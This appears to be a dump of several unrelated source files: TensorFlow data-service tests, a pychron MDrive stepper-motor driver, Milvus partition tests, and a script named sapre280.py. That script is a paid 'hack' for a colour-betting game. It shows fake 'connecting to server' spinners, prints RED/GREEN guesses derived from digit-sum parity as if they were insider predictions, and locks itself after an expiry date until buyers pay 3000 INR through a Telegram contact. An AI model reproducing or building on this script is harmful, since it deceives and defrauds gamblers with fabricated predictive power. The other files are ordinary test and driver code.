    ds = self.make_distributed_range_dataset(num_elements, cluster)
    iterator = iter(ds)
    results = []
    # Read halfway through the dataset.
    for _ in range(num_elements // 2):
      results.append(next(iterator).numpy())
    cluster.add_worker()
    # Wait for the new worker to register with the dispatcher.
    while cluster.num_registered_workers() < 2:
      time.sleep(10 / 1000)  # 10ms
    for elem in iterator:
      results.append(elem.numpy())
    self.assertCountEqual(2 * list(range(num_elements)), results)

  @combinations.generate(
      combinations.times(test_base.eager_only_combinations(),
                         combinations.combine(use_same_port=[True, False]),
                         data_service_test_base.all_cluster_configurations()))
  def testRestartWorker(self, use_same_port, work_dir, fault_tolerant_mode):
    """A restarted worker restarts its copy of the dataset from the beginning."""
    cluster = data_service_test_base.TestCluster(
        num_workers=1,
        work_dir=work_dir,
        fault_tolerant_mode=fault_tolerant_mode)
    num_elements = 100
    ds = self.make_distributed_range_dataset(num_elements, cluster)
    iterator = iter(ds)
    # Read halfway through the dataset.
    midpoint = num_elements // 2
    for i in range(midpoint):
      self.assertEqual(i, next(iterator).numpy())
    # Stop the original worker and start a new one.
    cluster.workers[0].restart(use_same_port=use_same_port)
    # There may have been some elements prefetched from the first worker
    # before it was stopped.
    while True:
      val = next(iterator).numpy()
      if val == 0:
        break
    # The dataset starts over now that we read from the new worker.
    # TODO(b/157086991): Iterate until end of sequence when we support
    # detecting lost workers.
    for i in range(1, num_elements // 2):
      val = next(iterator).numpy()
      self.assertEqual(i, val)

  @combinations.generate(test_base.eager_only_combinations())
  def testChangeProcessingModeAfterRestart(self):
    """Reusing a job name with a different processing mode must fail."""
    self.skipTest("b/170910141")
    cluster = data_service_test_base.TestCluster(num_workers=1)
    num_elements = 100
    range_dataset = dataset_ops.Dataset.range(num_elements)
    ds = range_dataset.apply(
        data_service_ops.distribute(
            processing_mode="parallel_epochs",
            service=cluster.target,
            job_name="test"))
    iterator = iter(ds)
    for i in range(num_elements // 2):
      self.assertEqual(i, next(iterator).numpy())
    cluster.restart_dispatcher()
    ds = range_dataset.apply(
        data_service_ops.distribute(
            processing_mode="distributed_epoch",
            service=cluster.target,
            job_name="test"))
    with self.assertRaisesOpError("already an existing job with that name "
                                  "using processing mode <parallel_epochs>"):
      next(iter(ds)).numpy()

  @combinations.generate(
      combinations.times(
          test_base.eager_only_combinations(),
          combinations.combine(work_dir=[TMP_WORK_DIR, NO_WORK_DIR])))
  def testDistributeLargeGraphThenRegisterWorker(self, work_dir):
    """A graph larger than the gRPC limit still reaches a late worker."""
    cluster = data_service_test_base.TestCluster(
        num_workers=0, work_dir=work_dir, fault_tolerant_mode=False)
    # Larger than default OSS grpc message size limit of 4MB.
    tensor = array_ops.ones((2, 1000, 1000), dtype=dtypes.float32)
    ds = dataset_ops.Dataset.from_tensors(tensor)
    ds = self.make_distributed_dataset(ds, cluster)
    it = iter(ds)
    cluster.add_worker()
    self.assertAllEqual(next(it), tensor)
# Standard TensorFlow test entry point.
if __name__ == "__main__":
  test.main()
|
sapre280.py | #!/usr/bin/python
# -*- coding: UTF-8 -*-
from os import system, name
import itertools
import threading
import time
import sys
import datetime
from base64 import b64decode,b64encode
from datetime import date
# Hard-coded "license" window: the script refuses to run after this date.
expirydate = datetime.date(2022, 1, 30)
#expirydate = datetime.date(2021, 12, 30)
today=date.today()
# (The original assigned ``today`` twice in a row; the duplicate was removed.)
# ANSI escape sequences for coloured terminal output (3;3x = italic + colour).
green="\033[3;32m"
neon="\033[3;36m"
nc="\033[00m"
red="\033[3;31m"
purple="\033[3;34m"
yellow="\033[3;33m"
voilet="\033[3;35m"
def hero():
    """Interactive colour-"prediction" loop for one trading window.

    Prompts for each round's price and prints a RED/GREEN prediction derived
    from digit-sum parity. Reads the module-level ``period`` (set by the
    caller before invoking hero()) as the starting round number. Exits when
    the user enters 0 at the continue prompt, enters nothing, or after 16
    rounds.
    """
    def chalo():
        # Fake "connecting" spinner; blocks this thread for 20 seconds.
        done = False
        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rconnecting to server for next colour--------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')
        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True
    def chalo1():
        # Second fake spinner; also blocks for 20 seconds.
        done = False
        def animate():
            for c in itertools.cycle(['|', '/', '-', '\\']):
                if done:
                    break
                sys.stdout.write('\rgetting the colour wait --------- ' + c)
                sys.stdout.flush()
                time.sleep(0.1)
            sys.stdout.write('\rDone! ')
        t = threading.Thread(target=animate)
        t.start()
        time.sleep(20)
        done = True
    def clear():
        # Clear the terminal: 'cls' on Windows ('nt'), 'clear' elsewhere.
        if name == 'nt':
            _ = system('cls')
        else:
            _ = system('clear')
    def getSum(n):
        # Sum of the decimal digits of n. (Renamed the accumulator from
        # ``sum``, which shadowed the builtin.)
        total = 0
        for digit in str(n):
            total += int(digit)
        return total
    clear()
    y=1
    newperiod=period
    banner='figlet RXCE8.1|lolcat '
    thisway=[0,2,4,6,8,10,12,14,16,18,20]
    thatway=[1,3,5,7,9,11,13,15,17,19]
    numbers=[]
    i=1
    while(y):
        clear()
        system(banner)
        print("Contact me on telegram @Hackmgk")
        print("Enter" ,newperiod,"Price :")
        current=int(input())
        chalo()
        print("\n---------Successfully Connected to the server-----------")
        chalo1()
        print("\n---------Successfully got the colour -------------")
        print('\n')
        if i in thisway:
            m=getSum(current)
            n=int(current)%10
            # Same parity of digit-sum and last digit selects one branch;
            # having seen the number before flips the prediction.
            if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
                if current in numbers:
                    print(newperiod+1," : 💥🟢GREEN1🟢💥")
                else:
                    print(newperiod+1," : 💥🔴RED2🔴💥")
            else:
                if current in numbers:
                    print(newperiod+1," : 💥🔴RED3🔴💥")
                else:
                    print(newperiod+1," : 💥🟢GREEN4🟢💥")
        if i in thatway:
            m=getSum(current)+1
            n=int(current)%10
            if((m%2==0 and n%2==0) or (m%2==1 and n%2==1)):
                if current in numbers:
                    print(newperiod+1,": 💥💥🔴RED5🔴💥💥")
                else:
                    print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
            else:
                if current in numbers:
                    print(newperiod+1,": 💥💥🟢GREEN6🟢💥💥")
                else:
                    print(newperiod+1,": 💥💥🔴RED7🔴💥💥")
        i=i+1
        newperiod+=1
        numbers.append(current)
        y=input("Do you want to play : Press 1 and 0 to exit \n")
        # BUG FIX: input() returns a string, so the original comparison
        # ``y == 0`` was never true and entering 0 did not exit the loop.
        if(y=="0"):
            y=False
        if (len(numbers)>15):
            clear()
            system('figlet Thank you!!')
            print("Play on next specified time!!")
            print("-----------Current Time UP----------")
            sys.exit(" \n \n \n Contact on Telegram @Hackmgk")
        print(numbers)
# Gate the tool on the hard-coded expiry date, then only allow play inside
# five fixed daily time windows; each window sets the starting round number
# (global ``period``) consumed by hero().
if(expirydate>today):
    now = datetime.datetime.now()
    # Window boundaries for today, local time (each window is HH:55-HH+1:35).
    First = now.replace(hour=10, minute=55, second=0, microsecond=0)
    Firstend = now.replace(hour=11, minute=35, second=0, microsecond=0)
    Second = now.replace(hour=13, minute=55, second=0, microsecond=0)
    Secondend = now.replace(hour=14, minute=35, second=0, microsecond=0)
    Third = now.replace(hour=16, minute=55, second=0, microsecond=0)
    Thirdend = now.replace(hour=17, minute=35, second=0, microsecond=0)
    Final = now.replace(hour=20, minute=55, second=0, microsecond=0)
    Finalend = now.replace(hour=21, minute=35, second=0, microsecond= 0)
    FFinal = now.replace(hour=22, minute=55, second=0, microsecond= 0)
    FFinalend = now.replace(hour=23, minute=35, second=0, microsecond= 0)
    if (now>First and now<Firstend):
        period=220
        hero()
    elif(now>Second and now<Secondend):
        period=280
        hero()
    elif(now>Third and now<Thirdend):
        period=340
        hero()
    elif(now>Final and now<Finalend):
        period=420
        hero()
    elif(now>FFinal and now<FFinalend):
        period=460
        hero()
    else:
        banner='figlet RXCE8.1|lolcat'
        # NOTE(review): the schedule printed below does not match the window
        # boundaries computed above (e.g. the first window starts 10:55 AM,
        # not 11:00 PM) — confirm which is intended.
        print("Hi!! Thanks for buying Life time the hack")
        print("----------Your play time-----------")
        print("          11:00 PM- 11:35 PM")
        print("          02:00 PM- 02:35 PM")
        print("          05:00 PM- 05:35 PM")
        print("          09:00 PM- 09:35 PM")
        print("          11:00 PM- 12:35 PM")
        print("Please play on the given time, and ")
        print("If you think it is an error contact")
        print("   admin on telegram @Hackmgk      ")
else:
    banner='figlet Thank '
    system(banner)
    print("*---------*----------*-------------*----------*")
    print("Your hack has expired--- Please contact")
    print(" on telegram ----@hackmgk for activating")
    print("      Recharge Amount : Total limit " )
    print("      2. 3000 INR   ------- 30 Days")
    print("*---------*----------*-------------*----------*")
    print("Your custom hack can be made request from us.")
    print( "Msg me on telegram @hackmgk")
|
base.py | # ===============================================================================
# Copyright 2016 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
from traits.api import Int, Bool, Float, CInt
# ============= standard library imports ========================
from threading import Thread, Event
import time
# ============= local library imports ==========================
from pychron.hardware.base_linear_drive import BaseLinearDrive
# Mapping of MDrive MCode error numbers -> human-readable descriptions.
# Keys are the decimal codes returned by the drive's ER variable, as strings
# (see _check_error below / the MDrive MCode Programming Manual).
ERROR_MAP = {'6': 'An I/O is already set to this type. Applies to non-General Purpose I/O.',
             '8': 'Tried to set an I/O to an incorrect I/O type.',
             '9': 'Tried to write to I/O set as Input or is "TYPED".',
             '10': 'Illegal I/O number.',
             '11': 'Incorrect CLOCK type.',
             '12': 'Illegal Trip / Capture',
             '20': 'Tried to set unknown variable or flag. Trying to set an undefined variable of flag. '
                   'Also could be a typo.',
             '21': 'Tried to set an incorrect value. Many variables have a range such as the Run Current (RC) '
                   'which is 1 to 100%. As an example, you cannot set the RC to 110%.',
             '22': 'VI is set greater than or equal to VM. The Initial Velocity is set equal to, or higher than the '
                   'Maximum Velocity. VI must be less than VM.',
             '23': 'VM is set less than or equal to VI. The Maximum Velocity is set equal to, or lower than the '
                   'Initial Velocity. VM must be greater than VI.',
             '24': 'Illegal data entered. Data has been entered that the device does not understand.',
             '25': 'Variable or flag is read only. Read only flags and variables cannot be set.',
             '26': 'Variable or flag is not allowed to be incremented or decremented. IC and DC cannot be used on '
                   'variables or flags such as Baud and Version.',
             '27': 'Trip not defined.Trying to enable a trip that has not yet been defined.',
             '28': 'WARNING! Trying to redefine a program label or variable. This can be caused when you download '
                   'a program over a program already saved. Before downloading a new or edited program, type <FD> '
                   'and press ENTER to return the device to the Factory Defaults. '
                   'You may also type <CP> and press ENTER to Clear the Program.',
             '29': 'Trying to redefine a built in command, variable or flag.',
             '30': 'Unknown label or user variable. Trying to Call or Branch to a Label or '
                   'Variable that has not yet been defined.',
             '31': 'Program label or user variable table is full. '
                   'The table has a maximum capacity of 22 labels and/or user variables.',
             '32': 'Trying to set a label (LB). You cannot name a label and then try to set it to a value. '
                   'Example: Lable P1 (LB P1 ). The P1 cannot be used to set a variable such as P1=1000.',
             '33': 'Trying to SET an Instruction.',
             '34': 'Trying to Execute a Variable or Flag',
             '35': 'Trying to Print Illegal Variable or Flag',
             '36': 'Illegal Motor Count to Encoder Count Ratio',
             '37': 'Command, Variable or Flag Not Available in Drive',
             '38': 'Missing parameter separator',
             '39': 'Trip on Position and Trip on Relative Distance not allowed together',
             '40': 'Program not running. If HOLD (H) is entered in Immediate Mode and a program is not running.',
             '41': 'Stack overflow',
             '42': 'Illegal program address. Tried to Clear, List, Execute, etc. an incorrect Program address.',
             '43': 'Tried to overflow program stack. Calling a Sub-Routine or Trip Routine with no Return.',
             '44': 'Program locked. User Programs can be Locked with the <LK> command. Once Locked, '
                   'the program cannot be listed or edited in any way.',
             '45': 'Trying to Overflow Program Space.',
             '46': 'Not in Program Mode.',
             '47': 'Tried to Write to Illegal Flash Address',
             '48': 'Program Execution stopped by I/O set as Stop.',
             '60': 'Not used',
             '61': 'Trying to set illegal BAUD rate. The only Baud Rates accepted are those listed on the '
                   'Properties Page of IMS Terminal. (4,800, 9,600, 19,200, 38,400, 115,200)',
             '62': 'IV already pending or IF Flag already TRUE.',
             '63': 'Character over-run. Character was received. Processor did not have time to process it and it'
                   ' was over-written by the next character.',
             '64': 'Startup Calibration failed (Hybrid only)',
             '70': 'FLASH Check Sum Fault',
             '71': 'Internal Temperature Warning, 10C to Shutdown',
             '72': 'Internal Over TEMP Fault, Disabling Drive',
             '73': 'Tried to SAVE while moving',
             '74': 'Tried to Initialize Parameters (IP) or Clear Program (CP) while Moving',
             '75': 'Linear Overtemperature Error (For units without Internal Over Temp)',
             '80': 'HOME switch not defined. Attempting to do a HOME (H) sequence but '
                   'the Home Switch has not yet been defined.',
             '81': 'HOME type not defined. The HOME (HM or HI) Command has been programmed '
                   'but with no type or an illegal type. '
                   '(Types = 1, 2, 3, or 4)',
             '82': 'Went to both LIMITS and did not find home. The motion encroached both limits '
                   'but did not trip the Home switch. Indicates a possible badswitch or a bad circuit.',
             '83': 'Reached plus LIMIT switch. The LIMIT switch in the plus directionwas tripped.',
             '84': 'Reached minus LIMIT switch. The LIMIT switch in the minus directionwas tripped.',
             '85': 'MA or MR is not allowed during a HOME and a HOME is not allowed while the device is in motion.',
             '86': 'Stall detected. The Stall Flag (ST) has been set to 1.',
             '87': 'MDrive In Clock Mode, JOG not allowed',
             '88': 'MDrive Following error',
             '89': 'MDrive Reserved',
             '90': 'Motion Variables are too low switching to EE=1',
             '91': 'Motion stopped by I/O set as Stop.',
             '92': 'Position Error in Closed loop. motor will attempt tp position the shaft within the deadband, '
                   'After failing 3 attempts Error 92 will be generated.Axis will continue to function normally.',
             '93': 'MR or MA not allowed while correcting position at end of previous MR or MA.',
             '94': 'Clear Locked Rotor Fault not allowed while in Motion. MDrive Hybrid products(MAI) only.'}
class BaseMDrive(BaseLinearDrive):
    """Base driver for Schneider Electric / IMS MDrive motion devices.

    Communication uses the MCode ASCII protocol: variables are written with
    ``tell('<VAR> <value>')`` and read back with ``ask('PR <VAR>')``. Drive
    error codes are translated to text via ``ERROR_MAP``.
    """

    # trait declarations; values are loaded from the device config file
    initial_velocity = CInt
    acceleration = CInt
    deceleration = CInt
    _velocity = Int
    run_current = CInt
    use_encoder = Bool
    steps_per_turn = CInt
    turns_per_mm = Float
    slew_velocity = CInt

    # threading.Event used to stop a running jitter thread; None until
    # start_jitter() is called
    _jitter_evt = None

    def load_additional_args(self, config):
        """Load Motion/Homing/General options from ``config`` and build the
        linear mapper. Always returns True."""
        args = [
            ('Motion', 'steps', 'int'),
            ('Motion', 'min_steps', 'int'),
            ('Motion', 'sign'),
            ('Motion', 'velocity', 'int'),
            ('Motion', 'slew_velocity'),
            ('Motion', 'initial_velocity'),
            ('Motion', 'acceleration'),
            ('Motion', 'deceleration'),
            ('Motion', 'run_current'),
            ('Motion', 'use_encoder', 'boolean'),
            ('Motion', 'turns_per_mm'),

            ('Homing', 'home_delay'),
            ('Homing', 'home_velocity'),
            ('Homing', 'home_acceleration'),
            ('Homing', 'home_at_startup', 'boolean'),
            ('Homing', 'home_position'),
            ('Homing', 'home_limit'),

            ('General', 'min'),
            ('General', 'max'),
            ('General', 'nominal_position'),
            ('General', 'units')]
        self._load_config_attributes(config, args)

        self.linear_mapper_factory()
        return True

    def initialize(self, *args, **kw):
        """Push the configured motion parameters to the drive.

        The encoder mode determines the step resolution: 2048 encoder counts
        vs 51200 microsteps per revolution.
        """
        if super(BaseMDrive, self).initialize(*args, **kw):
            self.set_use_encoder(self.use_encoder)
            self.steps_per_turn = 2048 if self.use_encoder else 51200

            # write each configured (non-zero) parameter to the drive via
            # the matching set_<attr> method
            for attr in ('velocity', 'initial_velocity', 'acceleration',
                         'deceleration', 'run_current'):
                v = getattr(self, attr)
                if v:
                    getattr(self, 'set_{}'.format(attr))(v)
        return True

    def is_simulation(self):
        """Return whether this device runs in simulation mode."""
        return self.simulation

    def move_absolute(self, pos, velocity=None, acceleration=None,
                      deceleration=None, block=True, units='steps'):
        """Move to absolute position ``pos`` (MCode ``MA``)."""
        self.debug('move absolute pos={}, block={}, units={}'.format(pos, block, units))
        self._move(pos, velocity, acceleration, deceleration, False, block, units)
        return True

    def move_relative(self, pos, velocity=None, acceleration=None,
                      deceleration=None, block=True, units='steps'):
        """Move by relative distance ``pos`` (MCode ``MR``)."""
        self.debug('move relative pos={}, block={}, units={}'.format(pos, block, units))
        self._move(pos, velocity, acceleration, deceleration, True, block, units)
        return True

    def get_position(self, units='steps'):
        """Return the current position converted to ``units``
        ('steps', 'turns' or 'mm')."""
        steps = self.read_position()
        self.debug('read position steps={}'.format(steps))
        pos = self._convert_steps(steps, units)
        self.debug('converted position= {} ({})'.format(pos, units))
        return pos

    def stalled(self):
        """Return True (and clear the stall flag ``ST``) if the drive
        reports a stall; otherwise return False (previously implicit None)."""
        if self._get_var('ST'):
            self._set_var('ST', 0)
            return True
        return False

    def slew(self, scalar):
        """Slew at ``slew_velocity * scalar`` (the sign gives direction)."""
        self.set_slew(self.slew_velocity * scalar)
        return True

    def stop_drive(self):
        """Stop motion by commanding a zero slew velocity."""
        self.set_slew(0)
        return True

    def start_jitter(self, turns, p1, p2, velocity=None, acceleration=None,
                     deceleration=None):
        """Oscillate back and forth by ``turns`` on a daemon thread.

        ``p1``/``p2`` are the pauses (seconds) after the forward/backward
        move. Stop the oscillation with ``stop_jitter``.
        """
        def _jitter():
            kw = dict(velocity=velocity, acceleration=acceleration,
                      deceleration=deceleration, units='turns')
            while not self._jitter_evt.is_set():
                self.move_relative(turns, **kw)
                time.sleep(p1)
                self.move_relative(-turns, **kw)
                time.sleep(p2)

        self._jitter_evt = Event()
        t = Thread(target=_jitter)
        # Thread.setDaemon is deprecated; assign the attribute instead
        t.daemon = True
        t.start()
        return True

    def stop_jitter(self):
        """Signal the jitter thread (if any) to exit after its current cycle."""
        if self._jitter_evt:
            self._jitter_evt.set()
        return True

    # MCode variable setters ------------------------------------------------
    def set_initial_velocity(self, v):
        self._set_var('VI', v)

    def set_velocity(self, v):
        self._set_var('VM', v)

    def set_acceleration(self, a):
        self._set_var('A', a)

    def set_deceleration(self, a):
        self._set_var('D', a)

    def set_slew(self, v):
        self._set_var('SL', v)

    def set_encoder_position(self, v):
        self._set_var('P', v)

    def set_use_encoder(self, b):
        # EE expects 0/1; '{:b}' renders a bool as '0'/'1'
        self._set_var('EE', '{:b}'.format(b))

    def set_run_current(self, rc):
        self._set_var('RC', rc)

    def set_home(self):
        """Define the current location as home (position counter = 0)."""
        self.set_encoder_position(0)

    def moving(self):
        """Return True while the axis is in motion."""
        return self._moving()

    def block(self, n=3, tolerance=1, progress=None, homing=False):
        """Block the caller until motion stops.

        The extra parameters are accepted for interface compatibility with
        other linear drives but are not used by this implementation.
        """
        self._block()

    def tosteps(self, v, units='turns'):
        """Convert ``v`` expressed in ``units`` to motor steps."""
        return self._get_steps(v, units)

    # private ----------------------------------------------------------------
    def _convert_steps(self, v, units):
        """Convert a step count to ``units``; None passes through unchanged."""
        if v is not None:
            if units == 'turns':
                v /= float(self.steps_per_turn)
            elif units == 'mm':
                v /= float(self.turns_per_mm * self.steps_per_turn)
        return v

    def _get_steps(self, v, units):
        """Convert ``v`` in ``units`` ('turns' or 'mm') to an integer step
        count; any other unit returns ``v`` unchanged (assumed steps)."""
        if units == 'turns':
            v = int(v * self.steps_per_turn)
        elif units == 'mm':
            v = int(v * self.turns_per_mm * self.steps_per_turn)
        return v

    def _set_motor(self, value):
        """Move the motor to ``value`` steps (relative, non-blocking).

        BUG FIX: the previous implementation called
        ``self._move(value, relative, block)``, which passed ``relative`` and
        ``block`` into the velocity/acceleration slots and omitted four
        required arguments — a guaranteed TypeError at runtime.
        """
        self._data_position = value
        self._move(value, None, None, None, True, False, 'steps')

    def _set_var(self, var, val, check_error=True):
        """Write ``<var> <val>`` to the drive.

        Returns False when the drive raises an error for this write, True
        otherwise. A pre-existing error is logged but does not fail this
        write.
        """
        if check_error:
            args = self._check_error()
            if args:
                ecode, estr = args
                self.warning('Existing error ErrorCode={}, Error={}'.format(ecode, estr))

        ret = True
        self.tell('{} {}'.format(var, val))
        if check_error:
            args = self._check_error()
            if args:
                ecode, estr = args
                self.warning('Error setting {}={} ErrorCode={}. Error={}'.format(var, val, ecode, estr))
                ret = False
        return ret

    def _check_error(self):
        """Return ``(code, description)`` when the drive's error flag ``EF``
        is set; return None when there is no pending error."""
        if self._get_var('EF') == 1:
            ecode = str(self._get_var('ER', as_int=False)).strip()
            estr = ERROR_MAP.get(ecode, 'See MCode Programming Manual')
            return ecode, estr

    def _get_var(self, c, as_int=True):
        """Read variable ``c`` with ``PR``; optionally coerce the response
        to int (None when the response does not parse)."""
        resp = self.ask('PR {}'.format(c))
        if as_int and resp is not None:
            try:
                resp = int(resp)
            except (TypeError, ValueError) as e:
                self.debug('invalid var={} response="{}", error={}'.format(c, resp, e))
                resp = None

        self.info('Variable {}={}'.format(c, resp))
        return resp

    def _move(self, pos, velocity, acceleration, deceleration, relative, block, units):
        """Issue an MA/MR move, optionally blocking until it completes.

        Unset motion parameters default to the configured attributes.
        NOTE(review): a None ``velocity`` defaults to ``initial_velocity``
        and is written to VI (not VM) inside ``func`` — confirm intended.
        """
        if velocity is None:
            velocity = self.initial_velocity
        if acceleration is None:
            acceleration = self.acceleration
        if deceleration is None:
            deceleration = self.deceleration

        pos = self._get_steps(pos, units)
        self.debug('converted steps={}'.format(pos))

        def func():
            self.set_initial_velocity(velocity)
            self.set_acceleration(acceleration)
            self.set_deceleration(deceleration)

            cmd = 'MR' if relative else 'MA'
            self.tell('{} {}'.format(cmd, pos))
            self._block()

        if block:
            func()
        else:
            t = Thread(target=func)
            t.daemon = True
            t.start()
        return True

    def _moving(self, motion_flag='MV'):
        """
        0= Not Moving
        1= Moving

        motion flags
        MP= moving to position. set after MA or MR
        MV= axis in motion
        """
        return self._get_var(motion_flag) == 1

    def _block(self, period=0.1):
        """Poll the motion flag every ``period`` seconds until the axis stops."""
        while self._moving():
            time.sleep(period)

    def _read_motor_position(self, *args, **kw):
        """Return the raw position counter ``P``."""
        return self._get_var('P')
# ============= EOF =============================================
|
test_partition.py | import time
import random
import pdb
import threading
import logging
from multiprocessing import Pool, Process
import pytest
from utils.utils import *
from common.constants import *
TIMEOUT = 120
class TestCreateBase:
    """
    ******************************************************************
      The following cases are used to test `create_partition` function
    ******************************************************************
    """
    # These are integration tests: `connect` is a live Milvus client fixture
    # and `collection` a pre-created collection name.

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_a(self, connect, collection):
        '''
        target: test create partition, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        connect.create_partition(collection, default_tag)

    @pytest.mark.tags(CaseLabel.L2)
    @pytest.mark.timeout(600)
    def test_create_partition_limit(self, connect, collection, args):
        '''
        target: test create partitions, check status returned
        method: call function: create_partition for 4097 times
        expected: exception raised
        '''
        threads_num = 8
        threads = []
        if args["handler"] == "HTTP":
            pytest.skip("skip in http mode")

        # `create` closes over `collection`; the `connect` parameter shadows
        # the fixture so each thread uses its own client connection.
        def create(connect, threads_num):
            for i in range(max_partition_num // threads_num):
                tag_tmp = gen_unique_str()
                connect.create_partition(collection, tag_tmp)

        for i in range(threads_num):
            m = get_milvus(host=args["ip"], port=args["port"], handler=args["handler"])
            t = threading.Thread(target=create, args=(m, threads_num))
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
        # the partition count is now at the limit, so one more must fail
        tag_tmp = gen_unique_str()
        with pytest.raises(Exception) as e:
            connect.create_partition(collection, tag_tmp)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_repeat(self, connect, collection):
        '''
        target: test create partition, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        connect.create_partition(collection, default_tag)
        try:
            # NOTE(review): if the duplicate create does NOT raise, the
            # except-block assertions are skipped and the test passes
            # silently — pytest.raises would be stricter.
            connect.create_partition(collection, default_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "create partition failed: partition name = %s already exists" % default_tag
        assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])

    @pytest.mark.tags(CaseLabel.L2)
    def test_create_partition_collection_not_existed(self, connect):
        '''
        target: test create partition, its owner collection name not existed in db, check status returned
        method: call function: create_partition
        expected: status not ok
        '''
        collection_name = gen_unique_str()
        try:
            connect.create_partition(collection_name, default_tag)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "create partition failed: can't find collection: %s" % collection_name

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_name_name_None(self, connect, collection):
        '''
        target: test create partition, tag name set None, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        tag_name = None
        try:
            connect.create_partition(collection, tag_name)
        except Exception as e:
            # client-side validation rejects None before any RPC
            assert e.args[0] == "`partition_name` value None is illegal"

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_different_partition_names(self, connect, collection):
        '''
        target: test create partition twice with different names
        method: call function: create_partition, and again
        expected: status ok
        '''
        connect.create_partition(collection, default_tag)
        tag_name = gen_unique_str()
        connect.create_partition(collection, tag_name)
        assert compare_list_elements(connect.list_partitions(collection), [default_tag, tag_name, '_default'])

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_insert_default(self, connect, id_collection):
        '''
        target: test create partition, and insert vectors, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        connect.create_partition(id_collection, default_tag)
        ids = [i for i in range(default_nb)]
        result = connect.insert(id_collection, default_entities)
        assert len(result.primary_keys) == len(ids)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_insert_with_tag(self, connect, id_collection):
        '''
        target: test create partition, and insert vectors, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        connect.create_partition(id_collection, default_tag)
        ids = [i for i in range(default_nb)]
        result = connect.insert(id_collection, default_entities, partition_name=default_tag)
        assert len(result.primary_keys) == len(ids)

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_insert_with_tag_not_existed(self, connect, collection):
        '''
        target: test create partition, and insert vectors, check status returned
        method: call function: create_partition
        expected: status not ok
        '''
        tag_new = "tag_new"
        connect.create_partition(collection, default_tag)
        ids = [i for i in range(default_nb)]  # NOTE(review): unused
        try:
            # inserting into a partition that was never created must fail
            connect.insert(collection, default_entities, partition_name=tag_new)
        except Exception as e:
            code = getattr(e, 'code', "The exception does not contain the field of code.")
            assert code == 1
            message = getattr(e, 'message', "The exception does not contain the field of message.")
            assert message == "partitionID of partitionName:%s can not be find" % tag_new

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_create_partition_insert_same_tags(self, connect, id_collection):
        '''
        target: test create partition, and insert vectors, check status returned
        method: call function: create_partition
        expected: status ok
        '''
        connect.create_partition(id_collection, default_tag)
        ids = [i for i in range(default_nb)]
        result = connect.insert(id_collection, default_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        # second batch into the same partition should append, not replace
        ids = [(i+default_nb) for i in range(default_nb)]
        new_result = connect.insert(id_collection, default_entities, partition_name=default_tag)
        assert len(new_result.primary_keys) == default_nb
        connect.flush([id_collection])
        res = connect.get_collection_stats(id_collection)
        assert res["row_count"] == default_nb * 2

    @pytest.mark.tags(CaseLabel.L2)
    def test_create_partition_insert_same_tags_two_collections(self, connect, collection):
        '''
        target: test create two partitions, and insert vectors with the same tag to each collection, check status returned
        method: call function: create_partition
        expected: status ok, collection length is correct
        '''
        connect.create_partition(collection, default_tag)
        collection_new = gen_unique_str()
        connect.create_collection(collection_new, default_fields)
        connect.create_partition(collection_new, default_tag)
        result = connect.insert(collection, default_entities, partition_name=default_tag)
        assert len(result.primary_keys) == default_nb
        new_result = connect.insert(collection_new, default_entities, partition_name=default_tag)
        assert len(new_result.primary_keys) == default_nb
        connect.flush([collection, collection_new])
        # identical partition names must not leak rows across collections
        res = connect.get_collection_stats(collection)
        assert res["row_count"] == default_nb
        res = connect.get_collection_stats(collection_new)
        assert res["row_count"] == default_nb
class TestShowBase:
    """
    ******************************************************************
      The following cases are used to test `list_partitions` function
    ******************************************************************
    """
    # Every collection implicitly contains the '_default' partition, so it
    # is always expected in the listing.

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_list_partitions(self, connect, collection):
        '''
        target: test show partitions, check status and partitions returned
        method: create partition first, then call function: list_partitions
        expected: status ok, partition correct
        '''
        connect.create_partition(collection, default_tag)
        assert compare_list_elements(connect.list_partitions(collection), [default_tag, '_default'])

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_list_partitions_no_partition(self, connect, collection):
        '''
        target: test show partitions with collection name, check status and partitions returned
        method: call function: list_partitions
        expected: status ok, partitions correct
        '''
        res = connect.list_partitions(collection)
        assert compare_list_elements(res, ['_default'])

    @pytest.mark.tags(CaseLabel.tags_smoke)
    def test_show_multi_partitions(self, connect, collection):
        '''
        target: test show partitions, check status and partitions returned
        method: create partitions first, then call function: list_partitions
        expected: status ok, partitions correct
        '''
        tag_new = gen_unique_str()
        connect.create_partition(collection, default_tag)
        connect.create_partition(collection, tag_new)
        res = connect.list_partitions(collection)
